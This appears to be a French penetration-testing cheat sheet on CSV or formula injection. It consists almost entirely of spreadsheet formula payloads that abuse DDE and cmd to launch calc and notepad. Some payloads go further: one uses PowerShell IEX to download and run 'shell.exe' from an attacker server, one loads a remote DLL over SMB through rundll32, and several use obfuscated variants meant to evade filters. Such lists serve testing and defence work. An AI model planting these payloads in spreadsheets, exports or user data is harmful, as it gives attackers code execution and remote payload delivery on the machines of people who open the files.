🥠CSV
Description
Exploitation
Payloads
# pop une calculatrice
DDE ("cmd";"/C calc";"!A0")A0
@SUM(1+1)*cmd|' /C calc'!A0
=2+5+cmd|' /C calc'!A0
# pop un bloc notes
=cmd|' /C notepad'!'A1'
# Execution de code powershell (ici pour dl un fichier distant)
=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0
# Telechargement de dll distante avec lolbin
=cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1
# Obfuscation et enchainement de commandes
=AAAA+BBBB-CCCC&"Hello"/12345&cmd|'/c calc.exe'!A
=cmd|'/c calc.exe'!A*cmd|'/c calc.exe'!A
+thespanishinquisition(cmd|'/c calc.exe'!A
= cmd|'/c calc.exe'!A
# Utilisation de rundll32 au lieu de cmd
=rundll32|'URL.dll,OpenURL calc.exe'!A
=rundll321234567890abcdefghijklmnopqrstuvwxyz|'URL.dll,OpenURL calc.exe'!ARessource
Mis à jour